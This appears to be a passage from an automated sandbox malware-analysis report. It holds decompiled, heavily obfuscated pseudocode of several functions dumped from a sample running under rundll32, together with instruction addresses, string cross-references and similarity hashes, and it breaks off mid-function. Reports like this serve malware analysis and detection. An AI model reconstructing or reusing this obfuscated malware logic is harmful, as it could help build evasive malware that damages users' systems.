				_v96 = 0x427aa5;
				_v96 = _v96 + 0xed3d;
				_v96 = _v96 + 0xffff13f4;
				_v96 = _v96 ^ 0x0046a078;
				_v20 = 0xf8f4;
				_v20 = _v20 * 0x4a;
				_t284 = 0x4469cd4;
				_v20 = _v20 ^ 0x004ab19f;
				_v36 = 0x7998ac;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x0008cf6c;
				do {
					while(_t301 != _t284) {
						if(_t301 == 0x661bd7c) {
							E007A957D(_v8, _v96, _v20, _v28, _v36);
						} else {
							if(_t301 == 0x8cd68b1) {
								_push(_v116);
								_push(_v124);
								_t293 = E007BDCF7(_v84, 0x7a1954, __eflags);
								_push(_v52);
								_push(_v48);
								__eflags = E007A9462(_t293, _v80,  &_v8, E007BDCF7(_v88, 0x7a1814, __eflags), _v56, _v40) - _v12;
								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
								E007AA8B0(_v132, _t293, _v108);
								E007AA8B0(_v72, _t294, _v32);
								_t343 = _v4;
								L8:
								_t284 = 0x4469cd4;
								_t348 =  &(_t348[0xb]);
								goto L9;
							} else {
								if(_t301 != 0x97dfe60) {
									goto L9;
								} else {
									_t301 = 0x8cd68b1;
									continue;
								}
							}
						}
						L12:
						return _t347;
					}
					_push(_v92);
					_push(_v100);
					_t285 = E007BDCF7(_v16, 0x7a1854, __eflags);
					_pop(_t311);
					_t286 =  *0x7c3dfc; // 0x0
					__eflags = E007AAA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
					_t301 = 0x661bd7c;
					_t347 =  ==  ? 1 : _t347;
					E007AA8B0(_v104, _t285, _v44);
					goto L8;
					L9:
					__eflags = _t301 - 0x94c729c;
				} while (__eflags != 0);
				goto L12;
			}

0x007b907f
0x007b9089
0x007b908b
0x007b9092
0x007b909c
0x007b90a4
0x007b90ac
0x007b90b7
0x007b90c2
0x007b90cd
0x007b90db
0x007b90dd
0x007b90e2
0x007b90eb
0x007b90f6
0x007b90fb
0x007b9103
0x007b910b
0x007b9113
0x007b9118
0x007b9120
0x007b912d
0x007b9130
0x007b9134
0x007b913c
0x007b9144
0x007b914c
0x007b9154
0x007b915c
0x007b9164
0x007b916c
0x007b9174
0x007b917c
0x007b9189
0x007b918d
0x007b9192
0x007b919a
0x007b91a2
0x007b91b2
0x007b91b6
0x007b91be
0x007b91c6
0x007b91d2
0x007b91d5
0x007b91d9
0x007b91e1
0x007b91e9
0x007b91f1
0x007b91f9
0x007b9201
0x007b9209
0x007b920e
0x007b9216
0x007b921e
0x007b9226
0x007b922b
0x007b9233
0x007b923b
0x007b9243
0x007b9248
0x007b9250
0x007b9258
0x007b9260
0x007b9268
0x007b926d
0x007b9277
0x007b927f
0x007b9287
0x007b928f
0x007b9294
0x007b929c
0x007b92a4
0x007b92ac
0x007b92ba
0x007b92bf
0x007b92c5
0x007b92cd
0x007b92d5
0x007b92da
0x007b92e2
0x007b92ed
0x007b92f8
0x007b9303
0x007b930b
0x007b9313
0x007b9318
0x007b9320
0x007b932c
0x007b932f
0x007b9333
0x007b9338
0x007b9340
0x007b934d
0x007b9351
0x007b9356
0x007b935e
0x007b9366
0x007b936a
0x007b9372
0x007b937a
0x007b9382
0x007b938a
0x007b9392
0x007b9397
0x007b939f
0x007b93a7
0x007b93ac
0x007b93b4
0x007b93bc
0x007b93c4
0x007b93cc
0x007b93d4
0x007b93d9
0x007b93e1
0x007b93ee
0x007b93f2
0x007b93f7
0x007b93ff
0x007b9407
0x007b940f
0x007b9414
0x007b941c
0x007b9424
0x007b942c
0x007b9434
0x007b943c
0x007b944f
0x007b9456
0x007b945b
0x007b9466
0x007b946e
0x007b9473
0x007b947b
0x007b947b
0x007b9489
0x007b95e5
0x007b948f
0x007b9495
0x007b94aa
0x007b94b3
0x007b94bb
0x007b94c0
0x007b94cb
0x007b950e
0x007b9519
0x007b951c
0x007b952e
0x007b9533
0x007b95b5
0x007b95b5
0x007b95ba
0x00000000
0x007b9497
0x007b949d
0x00000000
0x007b94a3
0x007b94a3
0x00000000
0x007b94a3
0x007b949d
0x007b9495
0x007b95ef
0x007b95f9
0x007b95f9
0x007b953c
0x007b9545
0x007b9550
0x007b9556
0x007b9564
0x007b95a0
0x007b95a2
0x007b95ab
0x007b95b0
0x00000000
0x007b95bd
0x007b95bd
0x007b95bd
0x00000000

Strings

=, xrefs: 007B9424
]R, xrefs: 007B9192
H/, xrefs: 007B92F8
dklp, xrefs: 007B9103
X, xrefs: 007B93AC
5NE, xrefs: 007B92A4

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5NE$=$H/$X$]R$dklp
API String ID: 0-668800459
Opcode ID: aac8b9fcc361892816b7db36fba341b7b4fe005ca826d2e134bd6a74aabe8742
Instruction ID: 0e6dd1eac5d38baae71d55dff072da5b15e2e490fdc60c9b0e100bad69ed7b54
Opcode Fuzzy Hash: aac8b9fcc361892816b7db36fba341b7b4fe005ca826d2e134bd6a74aabe8742
Instruction Fuzzy Hash: F2D100B11087809FD369CF25C48A64BBBF1BBC5758F50891DF2AA86260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007C0F33 Relevance: 7.8, Strings: 6, Instructions: 260
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007C0F33() {
				signed int _t237;
				signed char _t246;
				signed short _t255;
				signed int _t262;
				signed char _t269;
				intOrPtr* _t292;
				signed short _t301;
				void* _t302;
				signed short _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed short _t319;
				void* _t321;

				 *(_t321 + 0x20) = 0xee0abc;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
				_t262 = 0x40ff1a8;
				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
				 *(_t321 + 0x14) = 0x97563a;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
				_t309 = 0x68;
				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
				 *(_t321 + 0x54) = 0x46dfd;
				_t310 = 0x22;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
				 *(_t321 + 0x50) = 0x65d669;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
				 *(_t321 + 0x1c) = 0xa5dab8;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
				 *(_t321 + 0x58) = 0x508bac;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
				 *(_t321 + 0x38) = 0x6dc462;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
				 *(_t321 + 0x20) = 0x10f337;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
				_t311 = 0x7a;
				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
				 *(_t321 + 0x28) = 0x5a8e56;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
				 *(_t321 + 0x40) = 0x558325;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
				 *(_t321 + 0x3c) = 0x76576d;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
				 *(_t321 + 0x38) = 0x7fcfc;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
				 *(_t321 + 0x58) = 0x685aea;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
				 *(_t321 + 0x24) = 0x2cb25b;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
				 *(_t321 + 0x20) = 0x5c4f5f;
				_t312 = 0x75;
				_t306 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
				_t319 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
				 *(_t321 + 0x48) = 0x281dd4;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
				 *(_t321 + 0x60) = 0x5ec984;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
				 *(_t321 + 0x4c) = 0xbf15d9;
				_t313 = 0x6c;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
				_t314 = 0x6b;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
				 *(_t321 + 0x30) = 0x4468c3;
				_t315 = 0x7e;
				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
				while(1) {
					L1:
					_t292 =  *0x7c3e08; // 0x0
					while(1) {
						L2:
						_t237 =  *(_t321 + 0x60);
						L3:
						while(_t262 != 0x160fcc4) {
							if(_t262 == 0x26954f0) {
								 *_t237 = _t319;
								_t262 = 0xfeff895;
								 *_t292 =  *_t292 + 1;
								_t237 = _t319;
								 *(_t321 + 0x60) = _t237;
								continue;
							} else {
								if(_t262 == 0x40ff1a8) {
									_t179 = _t292 + 0x20; // 0x20
									_t237 = _t179;
									_t262 = 0x5ead19b;
									 *(_t321 + 0x60) = _t237;
									continue;
								} else {
									if(_t262 == 0x58e8483) {
										_push(_t262);
										_push(_t262);
										_t302 = 0x40;
										_t319 = E007A7FF2(_t302);
										__eflags = _t319;
										if(__eflags == 0) {
											goto L20;
										} else {
											_t262 = 0x160fcc4;
											goto L1;
										}
									} else {
										if(_t262 == 0x5ead19b) {
											_t255 = E007B7BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x7c3000);
											 *(_t321 + 0x70) = _t255;
											_t306 = _t255;
											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
											_t262 = 0x58e8483;
											while(1) {
												L1:
												_t292 =  *0x7c3e08; // 0x0
												goto L2;
											}
										} else {
											if(_t262 == 0xd41016e) {
												E007B8519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
												L20:
												_t292 =  *0x7c3e08; // 0x0
											} else {
												if(_t262 != 0xfeff895) {
													L17:
													__eflags = _t262 - 0x20f61b3;
													if(__eflags != 0) {
														L2:
														_t237 =  *(_t321 + 0x60);
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
													continue;
												}
											}
										}
									}
								}
							}
							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
							__eflags = 1;
							return 1;
						}
						_push( *(_t321 + 0x1c));
						_push( *(_t321 + 0x38));
						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
						E007B1652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E007BDCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x7a1590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
						E007AA8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
						_t321 = _t321 + 0x3c;
						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
						_t246 =  *((intOrPtr*)(_t306 + 6));
						_t269 =  *((intOrPtr*)(_t306 + 7));
						_t306 = _t306 + 8;
						_t262 = 0x26954f0;
						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
						__eflags = _t301;
						 *(_t319 + 0x18) = _t301;
						_t292 =  *0x7c3e08; // 0x0
						goto L17;
					}
				}
			}

0x007c0f36
0x007c0f40
0x007c0f48
0x007c0f56
0x007c0f5a
0x007c0f62
0x007c0f6a
0x007c0f72
0x007c0f80
0x007c0f85
0x007c0f8b
0x007c0f93
0x007c0fa0
0x007c0fa3
0x007c0fa7
0x007c0faf
0x007c0fb7
0x007c0fbc
0x007c0fc4
0x007c0fd1
0x007c0fd5
0x007c0fda
0x007c0fdf
0x007c0fe7
0x007c0fef
0x007c0ff7
0x007c0fff
0x007c100f
0x007c1013
0x007c101b
0x007c1023
0x007c102b
0x007c1035
0x007c1036
0x007c103a
0x007c103f
0x007c1047
0x007c104f
0x007c105d
0x007c1061
0x007c1066
0x007c106e
0x007c1076
0x007c107e
0x007c1086
0x007c108e
0x007c1096
0x007c109a
0x007c10a2
0x007c10aa
0x007c10b2
0x007c10bc
0x007c10c0
0x007c10c8
0x007c10d0
0x007c10d8
0x007c10e0
0x007c10e8
0x007c10f0
0x007c10f8
0x007c10fd
0x007c1107
0x007c1116
0x007c1119
0x007c111d
0x007c1129
0x007c112d
0x007c1131
0x007c1139
0x007c1141
0x007c1149
0x007c114e
0x007c1156
0x007c115e
0x007c1166
0x007c116e
0x007c1176
0x007c1182
0x007c1187
0x007c1191
0x007c1196
0x007c119c
0x007c11a4
0x007c11b1
0x007c11b2
0x007c11bc
0x007c11c5
0x007c11c9
0x007c11d1
0x007c11d1
0x007c11d1
0x007c11d7
0x007c11d7
0x007c11d7
0x00000000
0x007c11db
0x007c11ed
0x007c12a8
0x007c12aa
0x007c12af
0x007c12b1
0x007c12b3
0x00000000
0x007c11f3
0x007c11f9
0x007c1297
0x007c1297
0x007c129a
0x007c129f
0x00000000
0x007c11ff
0x007c1205
0x007c1277
0x007c1278
0x007c127b
0x007c1281
0x007c1285
0x007c1287
0x00000000
0x007c128d
0x007c128d
0x00000000
0x007c128d
0x007c1207
0x007c120d
0x007c124c
0x007c1252
0x007c1256
0x007c125d
0x007c1261
0x007c11d1
0x007c11d1
0x007c11d1
0x00000000
0x007c11d1
0x007c120f
0x007c1215
0x007c138c
0x007c1392
0x007c1392
0x007c121b
0x007c1221
0x007c1373
0x007c1373
0x007c1379
0x007c11d7
0x007c11d7
0x00000000
0x007c11d7
0x007c1227
0x007c122b
0x007c1233
0x00000000
0x007c1233
0x007c1221
0x007c1215
0x007c120d
0x007c1205
0x007c11f9
0x007c139b
0x007c13a1
0x007c13a7
0x007c13ac
0x007c13ac
0x007c12c4
0x007c12ca
0x007c12d5
0x007c12dc
0x007c131e
0x007c1333
0x007c133c
0x007c134a
0x007c134e
0x007c1351
0x007c1354
0x007c1361
0x007c1366
0x007c1366
0x007c1369
0x007c136d
0x00000000
0x007c136d
0x007c11d7

Strings

4t, xrefs: 007C0F72
=r;, xrefs: 007C1139
N, xrefs: 007C107E
mWv, xrefs: 007C108E
Zh, xrefs: 007C10C8
_O\, xrefs: 007C1107

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4t$=r;$_O\$mWv$N$Zh
API String ID: 0-2036408213
Opcode ID: c3135f0d02a327078be093cc1755ed1eb8201b234a3316153ed8cdbef6f2f66f
Instruction ID: 2c0ea999fa6e644450df8430c0b2e7a740f53a4fcc987475c2c4dd6f3de5c7e7
Opcode Fuzzy Hash: c3135f0d02a327078be093cc1755ed1eb8201b234a3316153ed8cdbef6f2f66f
Instruction Fuzzy Hash: 6BC162715083809FC318CF25C48991BBFE1FBCA358F548A1EF58696260D3B8D949CF86

Uniqueness

Uniqueness Score: -1.00%

Function 007BD389 Relevance: 7.7, Strings: 6, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E007BD389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				char _t245;
				void* _t263;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				void* _t306;
				intOrPtr _t307;
				char _t308;
				signed int* _t311;

				_push(_a28);
				_t306 = __edx;
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_t245 = E007B20B9(0);
				_v72 = _t245;
				_t311 =  &(( &_v168)[9]);
				_v84 = 0xd8cd3;
				_t307 = _t245;
				_v84 = _v84 ^ 0x2f0b54cb;
				_v84 = _v84 ^ 0x2f06dc18;
				_t280 = 0xd3d1227;
				_v116 = 0xdf2f98;
				_v116 = _v116 >> 4;
				_v116 = _v116 | 0xd629951a;
				_v116 = _v116 ^ 0xd62df7db;
				_v120 = 0x9d2532;
				_v120 = _v120 | 0x60368432;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xc1706bd2;
				_v104 = 0x3ed100;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x01fb42fe;
				_v132 = 0xac3ff1;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x8b709814;
				_v132 = _v132 + 0xffff5c55;
				_v132 = _v132 ^ 0x8a223f6b;
				_v164 = 0xc1955c;
				_v164 = _v164 + 0xe851;
				_v164 = _v164 >> 5;
				_t272 = 0x7c;
				_v164 = _v164 / _t272;
				_v164 = _v164 ^ 0x000d6983;
				_v76 = 0x371de3;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00157680;
				_v156 = 0xc7985;
				_v156 = _v156 + 0xffff997a;
				_v156 = _v156 + 0x5493;
				_v156 = _v156 ^ 0xa8ab967c;
				_v156 = _v156 ^ 0xa8a621f4;
				_v92 = 0xd6ada;
				_v92 = _v92 + 0xf102;
				_v92 = _v92 ^ 0x00049005;
				_v152 = 0xbb1df2;
				_t273 = 0x71;
				_v152 = _v152 * 0x37;
				_v152 = _v152 << 2;
				_v152 = _v152 + 0x7572;
				_v152 = _v152 ^ 0xa0c338c0;
				_v108 = 0xfb68a6;
				_v108 = _v108 / _t273;
				_v108 = _v108 * 0x38;
				_v108 = _v108 ^ 0x00745d8a;
				_v160 = 0x9cfb41;
				_v160 = _v160 >> 0xd;
				_v160 = _v160 + 0xffff2425;
				_v160 = _v160 | 0xc56bf860;
				_v160 = _v160 ^ 0xffffb927;
				_v100 = 0xcc3697;
				_v100 = _v100 << 9;
				_t274 = 0x3d;
				_v100 = _v100 / _t274;
				_v100 = _v100 ^ 0x027f162e;
				_v124 = 0x5e8102;
				_v124 = _v124 << 1;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x000928e5;
				_v96 = 0x9a5083;
				_v96 = _v96 + 0xffff88fb;
				_v96 = _v96 | 0x7e2ee754;
				_v96 = _v96 ^ 0x7eb15945;
				_v168 = 0x417f4c;
				_v168 = _v168 + 0x30ef;
				_v168 = _v168 + 0xffff0fcf;
				_v168 = _v168 | 0x766f950c;
				_v168 = _v168 ^ 0x7667a907;
				_v148 = 0xeb5ea2;
				_v148 = _v148 >> 1;
				_v148 = _v148 | 0xdbfe62fd;
				_v148 = _v148 ^ 0xdbf81284;
				_v88 = 0xc982d2;
				_v88 = _v88 | 0xbf502ba4;
				_v88 = _v88 ^ 0xbfda3d08;
				_v80 = 0x51a7e7;
				_v80 = _v80 | 0xcf4b4eb1;
				_v80 = _v80 ^ 0xcf5d8599;
				_v140 = 0x112038;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 | 0x79e3f6d0;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x000d6368;
				_v144 = 0x3c4be1;
				_v144 = _v144 << 1;
				_t275 = 0x51;
				_v144 = _v144 / _t275;
				_t276 = 0x44;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x0006a926;
				_v112 = 0xebe610;
				_t277 = 6;
				_v112 = _v112 / _t277;
				_v112 = _v112 ^ 0x8e2a0175;
				_v112 = _v112 ^ 0x8e0783c0;
				_v128 = 0x507b99;
				_v128 = _v128 ^ 0xb6dd86a4;
				_v128 = _v128 + 0xffff6e9b;
				_v128 = _v128 * 0x6f;
				_v128 = _v128 ^ 0x275b8ca8;
				_v136 = 0x1b49e9;
				_v136 = _v136 * 0x22;
				_v136 = _v136 ^ 0x6bc19a50;
				_v136 = _v136 ^ 0xda04c504;
				_v136 = _v136 ^ 0xb25c1cc6;
				do {
					while(_t280 != 0x9b6c7ef) {
						if(_t280 == 0xd3d1227) {
							_t280 = 0x9b6c7ef;
							continue;
						} else {
							if(_t280 == 0xd8aa277) {
								E007B9008(_v72, _v128, _v136);
							} else {
								_t317 = _t280 - 0xdb35d55;
								if(_t280 != 0xdb35d55) {
									goto L10;
								} else {
									_push(_v164);
									_push(_v132);
									_t308 = 0x44;
									E007A4B61( &_v68, _t308);
									_push(_v92);
									_v68 = _t308;
									_push(_v156);
									_t284 = _v76;
									_v60 = E007BDCF7(_v76, 0x7a173c, _t317);
									_t307 = E007BDE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
									E007AA8B0(_v144, _v60, _v112);
									_t311 =  &(_t311[0x19]);
									_t280 = 0xd8aa277;
									continue;
								}
							}
						}
						L13:
						return _t307;
					}
					_t263 = E007A4241(_t280, _v120,  &_v72, _a28, _v104);
					_t311 =  &(_t311[3]);
					__eflags = _t263;
					if(_t263 == 0) {
						_t280 = 0xcb447d9;
						goto L10;
					} else {
						_t280 = 0xdb35d55;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t280 - 0xcb447d9;
				} while (_t280 != 0xcb447d9);
				goto L13;
			}

0x007bd393
0x007bd39c
0x007bd39e
0x007bd3a5
0x007bd3a6
0x007bd3ad
0x007bd3b4
0x007bd3b5
0x007bd3bc
0x007bd3be
0x007bd3c3
0x007bd3ca
0x007bd3cd
0x007bd3d5
0x007bd3d7
0x007bd3e1
0x007bd3e9
0x007bd3ee
0x007bd3f6
0x007bd3fb
0x007bd403
0x007bd40b
0x007bd413
0x007bd41b
0x007bd41f
0x007bd427
0x007bd42f
0x007bd434
0x007bd439
0x007bd441
0x007bd449
0x007bd44d
0x007bd455
0x007bd45d
0x007bd465
0x007bd46d
0x007bd475
0x007bd480
0x007bd485
0x007bd48b
0x007bd493
0x007bd49b
0x007bd49f
0x007bd4a7
0x007bd4af
0x007bd4b7
0x007bd4bf
0x007bd4c7
0x007bd4cf
0x007bd4d7
0x007bd4df
0x007bd4e7
0x007bd4f4
0x007bd4f5
0x007bd4f9
0x007bd4fe
0x007bd506
0x007bd50e
0x007bd51c
0x007bd525
0x007bd529
0x007bd531
0x007bd539
0x007bd53e
0x007bd546
0x007bd54e
0x007bd558
0x007bd565
0x007bd570
0x007bd575
0x007bd57b
0x007bd583
0x007bd58b
0x007bd58f
0x007bd594
0x007bd59c
0x007bd5a4
0x007bd5ac
0x007bd5b4
0x007bd5bc
0x007bd5c4
0x007bd5cc
0x007bd5d4
0x007bd5dc
0x007bd5e4
0x007bd5ec
0x007bd5f0
0x007bd5f8
0x007bd600
0x007bd608
0x007bd610
0x007bd618
0x007bd620
0x007bd628
0x007bd630
0x007bd638
0x007bd63d
0x007bd645
0x007bd64a
0x007bd652
0x007bd65a
0x007bd662
0x007bd667
0x007bd671
0x007bd676
0x007bd67c
0x007bd684
0x007bd690
0x007bd698
0x007bd69c
0x007bd6a4
0x007bd6ac
0x007bd6b4
0x007bd6bc
0x007bd6c9
0x007bd6cd
0x007bd6d5
0x007bd6e2
0x007bd6e6
0x007bd6ee
0x007bd6f6
0x007bd6fe
0x007bd6fe
0x007bd70c
0x007bd7ec
0x00000000
0x007bd712
0x007bd718
0x007bd839
0x007bd71e
0x007bd71e
0x007bd720
0x00000000
0x007bd726
0x007bd726
0x007bd72e
0x007bd734
0x007bd737
0x007bd73c
0x007bd745
0x007bd74c
0x007bd750
0x007bd75c
0x007bd7d4
0x007bd7da
0x007bd7df
0x007bd7e2
0x00000000
0x007bd7e2
0x007bd720
0x007bd718
0x007bd840
0x007bd84b
0x007bd84b
0x007bd807
0x007bd80c
0x007bd80f
0x007bd811
0x007bd81a
0x00000000
0x007bd813
0x007bd813
0x00000000
0x007bd813
0x00000000
0x007bd81f
0x007bd81f
0x007bd81f
0x00000000

Strings

T.~, xrefs: 007BD5AC
ru, xrefs: 007BD4FE
hc, xrefs: 007BD64A
(, xrefs: 007BD594
K<, xrefs: 007BD652
0, xrefs: 007BD5C4

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: T.~$hc$ru$($0$K<
API String ID: 0-2343433060
Opcode ID: 5a69faaa27ead161d1a01041e8ea7ef219de755be316eb97b54feaf54afb0318
Instruction ID: 7ad1b3b33f58ca3775798d95cc55af2e14de609a5bbb5c9bf85e2314cf76a0bc
Opcode Fuzzy Hash: 5a69faaa27ead161d1a01041e8ea7ef219de755be316eb97b54feaf54afb0318
Instruction Fuzzy Hash: 82C124725087809FD768CF21C94AA5BFBE1FBD5744F104A1DF29A96260D7B68908CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007A3E3F Relevance: 7.7, Strings: 6, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E007A3E3F() {
				signed int _v4;
				intOrPtr _v8;
